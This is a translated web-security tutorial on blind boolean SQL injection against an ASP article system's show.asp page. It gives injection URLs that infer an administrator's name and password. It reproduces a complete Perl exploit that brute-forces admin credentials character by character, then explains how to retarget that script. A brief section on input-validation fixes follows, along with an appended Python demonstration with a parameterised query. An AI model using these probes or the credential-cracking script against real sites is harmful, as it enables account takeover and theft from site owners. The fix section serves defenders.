Example of a cross-table query


Author: angel. Article type: original. Original release date: 2004-04-02.

Recently I had nothing to do, so I helped a friend look at the security of his site. The site runs the 2002 special edition of the throne article system, which is the latest version as of now, July 2003. I did not know where a vulnerability might be, so I started by getting the code and familiarising myself with the database structure. In show.asp I found this:

    id = Request("id")
    ...
    Set rs = Server.CreateObject("ADODB.Recordset")
    sql = "select * from article where id=" & id
    rs.Open sql, conn, 1, 3
    If rs.EOF Then
        kille = "There is no such article"
    Else
        ...

Here is the vulnerability. The id parameter is not filtered at all, so a cross-table query is possible. As the name suggests, a cross-table query means that the statement we submit queries data in a table other than the one the page is meant to read. show.asp does not check id before placing it into the query statement; the table that statement reads is article, but by submitting subqueries we can query the user name and password in the admin table. That is a cross-table query, and it is one kind of SQL injection.

I have recently been learning web security and write articles to consolidate what I learn. This article involves quite a few knowledge points, so mistakes are hard to avoid and the writing is not polished. If you find an error, please contact me so we can discuss it. Thanks.

Note: in practice the browser automatically converts the spaces in the address bar to %20. I have removed the %20 from all the submitted statements shown here so that everyone can read them more clearly.

So what is a cross-table query? We submit an equation and judge by the page that comes back. For example, submit:

    http://127.0.0.1/show.asp?id=1 and 1=1
    http://127.0.0.1/show.asp?id=1 and 1=2

The key is the trailing 1=1 and 1=2: the first is true and the second is false. If the vulnerability exists, the two requests return different pages or different error messages. Take the special edition of the article system we just looked at as a concrete case: when we submit the first line, the article is displayed normally; when we submit the second, the page returns "There is no such article". In this way we can judge, from the information on the page, whether a subquery we submit obtained the correct information.

Now let's look at the SQL query statement. SELECT field FROM table WHERE condition is the standard form; it means: read a certain field from a certain table, subject to a condition. So SELECT MIN(ID) FROM admin WHERE LEN(admin)=5 can be read as: among the rows of the admin table whose admin field is a string of length 5, take the smallest value of the ID field. Explained this way it may still be hard to follow; I only explain the meaning of the statement, and the functions involved are not discussed here, so please refer to a professional database book. This statement queries ID, so what is returned is a value from the ID field. Suppose it returns 2; then the request

    http://127.0.0.1/show.asp?id=1 and 1=(select min(id) from admin where len(admin)=5)

is equivalent to

    http://127.0.0.1/show.asp?id=1 and 1=2

and returns "There is no such article", which is the false value. When we submit

    http://127.0.0.1/show.asp?id=1 and 2=(select min(id) from admin where len(admin)=5)

the article is displayed normally, which shows that the two sides of the equation are equal; so the minimum ID we wanted to query is 2.

Below are the statements I submitted and their results; all of them can be understood with the theory above. For easier reading I have dropped the browser's %20 encoding.

    http://127.0.0.1/show.asp?id=1 and 1=(select min(id) from admin where qx=2)
      // the minimum ID with administrator privileges is 1
    http://127.0.0.1/show.asp?id=1 and 1=(select id from admin where len(admin)=5)
      // the user name of the administrator with ID 1 has length 5
    http://127.0.0.1/show.asp?id=1 and 1=(select id from admin where len(pass)=5)
      // the password of the administrator with ID 1 has length 5
    http://127.0.0.1/show.asp?id=1 and 1=(select id from admin where left(admin,5)=admin)
      // the first 5 characters of the user name of the administrator with ID 1, counted from the left, are admin
    http://127.0.0.1/show.asp?id=1 and 1=(select id from admin where left(pass,5)=admin)
      // the first 5 characters of the password of the administrator with ID 1, counted from the left, are admin

Note: if what follows left(pass,1)= is a number, it must be enclosed in single quotes, for example left(pass,1)='1'; otherwise the program reports an error.

Writing an exploit

By now we know how to obtain the administrator's user name and password. In practice, though, only someone with no security awareness at all uses a password of 8 characters or fewer, and the same goes for the user name. If we really relied on submitting statements by hand we would grow old waiting, and our network bill would not allow it... so we have to write an exploit to do the tedious work for us. An exploit for this kind of thing is of course best written in Perl. But what should rookies like us do?
Use what you learn, and modify what others have written. Let's look at the "crack user & pass for dv_article system" script written by wawa. Thanks, wawa.

    #!/usr/bin/perl
    # The script cracks user & pass for the dv_article system
    # code by wawa@21cn.com
    # grouppage http://www.haowawa.com/
    # Homepage  http://wawa.haowawa.com/
    use IO::Socket;

    system('cls');
    $argc = @ARGV;
    if ($argc != 4) {
        print "\n\n";
        print "\t* The script crack user & pass for dv_article system *\n";
        print "\n\tWelcome to www.haowawa.com && wawa.haowawa.com\n";
        print "\n\tExample: dvtxt.pl 127.0.0.1 /txt/list.asp 53 \"Did not find related articles\"\n";
        print "\tdvtxt.pl <host> <path> <txtid> <errinfo>\n\n\n";
        exit;
    }
    $host    = $ARGV[0];   # target host
    $way     = $ARGV[1];   # path of the vulnerable page
    $txtid   = $ARGV[2];   # id of an article that exists
    $errinfo = $ARGV[3];   # text the page shows when the recordset is empty
    $port    = 80;
    print "\n\t* Welcome to www.haowawa.com && http://wawa.haowawa.com *\n";
    print "\n\nStart testing on $host, please wait...\n";

    # Step 1: find the smallest administrator id (flag=1) by trying 1..100
    for ($adminid = 1; $adminid <= 100; $adminid++) {
        $way1 = "?id=$txtid%20and%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)";
        &url;
        @res = &connect;
        #print @res;
        if ("@res" !~ /$errinfo/) {
            print "\n\t* Discovered one admin ID number: $adminid\n";
            last;
        }
    }
    # Step 2: password length, 1..10
    for ($passlen = 1; $passlen <= 10; $passlen++) {
        $way1 = "?id=$txtid%20and%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)";
        &url;
        @res = &connect;
        if ("@res" !~ /$errinfo/) {
            print "\n\t* Found the password length of admin ID=$adminid: $passlen characters\n";
            last;
        }
    }
    # Step 3: user name length, 1..20
    for ($userlen = 1; $userlen <= 20; $userlen++) {
        $way1 = "?id=$txtid%20and%20$userlen=(select%20len(username)%20from%20admin%20where%20id=$adminid)";
        &url;
        @res = &connect;
        if ("@res" !~ /$errinfo/) {
            print "\n\t* Found the user name length of admin ID=$adminid: $userlen characters\n";
            last;
        }
    }
    # Character sets tried at each position
    @dig   = (0..9);
    @char  = ('a'..'z');
    @tchar = qw(` ~ ! @ # $ ^ * ( ) _ = - { } [ ] : " ; < > ? | , . /);
    @dic   = (@dig, @char, @tchar);
    @dic1  = (@char, @dig, @tchar);
    print "\nStart trying to get the user name and password of admin ID=$adminid, please wait...\n";
    # Step 4: user name, one character at a time; the known prefix plus a guess is compared with mid(username,1,n)
    for ($userlocat = 1; $userlocat <= $userlen; $userlocat++) {
        foreach $usertemp (@dic1) {
            $user = $userdic . $usertemp;
            $way1 = "?id=$txtid%20and%20'$user'=(select%20mid(username,1,$userlocat)%20from%20admin%20where%20id=$adminid)";
            &url;
            @res = &connect;
            if ("@res" !~ /$errinfo/) {
                if ($userlocat == $userlen) {
                    print "\n\n\t* Get success!!! The name of admin ID=$adminid is: $user\n";
                    last;
                }
                print "\n\t* ID=$adminid: the first $userlocat characters of the user name are $user";
                $userdic = $userdic . $usertemp;
                last;
            }
        }
    }
    # Step 5: password, the same way
    for ($passlocat = 1; $passlocat <= $passlen; $passlocat++) {
        foreach $passtemp (@dic) {
            $pass = $passdic . $passtemp;
            $way1 = "?id=$txtid%20and%20'$pass'=(select%20mid(password,1,$passlocat)%20from%20admin%20where%20id=$adminid)";
            &url;
            @res = &connect;
            if ("@res" !~ /$errinfo/) {
                if ($passlocat == $passlen) {
                    print "\n\n\t* Get success!!! The password of admin ID=$adminid is: $pass";
                    last;
                }
                print "\n\t* ID=$adminid: the first $passlocat characters of the password are $pass";
                $passdic = $passdic . $passtemp;
                last;
            }
        }
    }
    print "\n\n\t* Test is completed. The user name with administrator privileges is $user! *\n";
    print "\n\n\n";
    #system('pause');

    # Build the raw HTTP/1.0 request for the current probe
    sub url {
        $req = "GET $way$way1 HTTP/1.0\n" . "Host: $host\n" . "Referer: $host\n" . "Cookie: \n\n";
    }
    # Send the request and return the response lines
    sub connect {
        my $connection = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
            || die "Sorry! Could not connect to $host\n";
        print $connection $req;
        my @res = <$connection>;
        return @res;
    }

In fact, scripts of this type are almost all the same: they use the vulnerability in one file to perform a cross-table query. Even if you don't understand most of the code, haven't you learned the SQL query statements? So we can modify this exploit, written for the DV article system, into one for the throne article system. Look at this:

    for ($adminid = 1; $adminid <= 100; $adminid++) {
        $way1 = "?id=$txtid%20and%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)";

The $adminid variable above defines the range of administrator IDs, 1 to 100; anything that follows a $ is a variable. (select%20min(id)%20from%20admin%20where%20flag=1) is the query statement we have to change. In the DV system an administrator is a row whose flag field equals 1, while in the throne system an administrator is a row whose qx field equals 2, so we change flag=1 to qx=2. from%20admin means query the admin table; that is the same in both systems, so we don't need to change it. The modified code is as follows:

    for ($adminid = 1; $adminid <= 100; $adminid++) {
        $way1 = "?id=$txtid%20and%20$adminid=(select%20min(id)%20from%20admin%20where%20qx=2)";

Again, this statement:

    for ($passlen = 1; $passlen <= 10; $passlen++) {
        $way1 = "?id=$txtid%20and%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)";

Here $passlen also defines a range, this time of password lengths. The password field in the DV system is password and in the throne system it is pass, so we change password to pass, like this:

    for ($passlen = 1; $passlen <= 50; $passlen++) {
        $way1 = "?id=$txtid%20and%20$passlen=(select%20len(pass)%20from%20admin%20where%20id=$adminid)";

Because the maximum password length in the throne system is 50, we also change the upper bound of $passlen to 50 (quite perverse). The rest is done the same way: as long as the table names, field names and data lengths are right, it works. If I really want to write a good exploit, though, I will have to force myself to learn those programming languages; after all, this is only a modification of someone else's work...

The solution

After so many attack methods, how do we fix this type of vulnerability? The cause is that the file does not check what is submitted, so we add code that checks it. Insert the short code below between the line that reads the value and the query statement; it checks the submitted variable before it is placed into the SQL query:

    If IsNumeric(id) = False Then
        Response.Write("Do not enter illegal characters")
        Response.End
    End If

This checks whether the variable id submitted by the user is integer data. So no matter whether someone submits a single quote, a semicolon, or and 1=1 / and 1=2, the page shows "Do not enter illegal characters"; how could anyone judge true or false then? This is also a wake-up call for the majority of ASP developers: any variable placed into a SQL query statement must be strictly checked, and all special characters must be prohibited. Only when the program is secure can users use it safely. There is another way; look at this code:

    Function IsInt(str)
        Dim l, i
        IsInt = False
        If Trim(str) = "" Or IsNull(str) Then Exit Function
        str = CStr(Trim(str))
        l = Len(str)
        For i = 1 To l
            If Mid(str, i, 1) > "9" Or Mid(str, i, 1) < "0" Then Exit Function
        Next
        IsInt = True
    End Function

    Function CheckStr(str)
        If Trim(str) = "" Or IsNull(str) Then Exit Function
        ' double any single quote so it cannot close the SQL string
        CheckStr = Replace(Trim(str), "'", "''")
    End Function

    Dim id
    id = CheckStr(Request.QueryString("id"))
    If IsInt(id) = False Then
        Response.Redirect "index.asp"
    End If

These two functions determine whether the value is an integer and check for some illegal characters; if any are found, the page jumps back to index.asp. Actually, as above, the first piece of code is more concise and targeted, since it only accepts integer values. Knowing more than one method is no bad thing; there are many methods and many more examples. Everyone should go and explore.
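The show.asp defect and the two fixes above, recreated as an added example in Python against an in-memory SQLite database. This is not code from the article or from either article system: the table and column names follow the article, the sample rows are constructed, and SQLite's length() and substr() stand in for Access's len() and left().

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the site's database: the article table that show.asp
    # reads, and the admin table the injected subqueries reach across to.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, admin TEXT, pass TEXT, qx INTEGER);
        INSERT INTO article VALUES (1, 'first post'), (2, 'second post');
        INSERT INTO admin VALUES (1, 'angel', 'p4ss5', 2), (2, 'bob', 'x', 1);
    """)
    return db

def show_vulnerable(db, id_param):
    # Same construction as show.asp: the raw id parameter is spliced into the SQL text.
    # True means an article row came back (page renders); False means the recordset
    # was empty ("There is no such article"). That one bit is the oracle the article uses.
    sql = "SELECT * FROM article WHERE id=" + id_param
    return db.execute(sql).fetchone() is not None

class BadInput(ValueError):
    """Raised where show.asp would Response.Write the error and Response.End."""

def show_fixed(db, id_param):
    # The article's fix, stated strictly: accept only a run of ASCII digits (the
    # per-character test of its IsInt function), then bind the value as a parameter
    # so the database never parses user input as SQL.
    if not re.fullmatch(r"[0-9]+", id_param):
        raise BadInput("Do not enter illegal characters")
    row = db.execute("SELECT * FROM article WHERE id=?", (int(id_param),)).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    probes = [
        "1 and 1=1",
        "1 and 1=2",
        "1 and 1=(select min(id) from admin where qx=2)",
        "1 and 1=(select id from admin where length(admin)=5)",
        "1 and 1=(select id from admin where substr(admin,1,5)='angel')",
    ]
    for p in probes:
        print(f"{p!r:70} vulnerable -> {show_vulnerable(db, p)}")
        try:
            show_fixed(db, p)
        except BadInput as e:
            print(f"{'':70} fixed      -> rejected: {e}")
```

Note that VBScript's IsNumeric also accepts signs, decimals and exponent forms such as 1e3, so the digit-only test of the article's IsInt function is the stricter of its two checks.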

Please credit the original URL when reposting: https://www.9cbs.com/read-92816.html
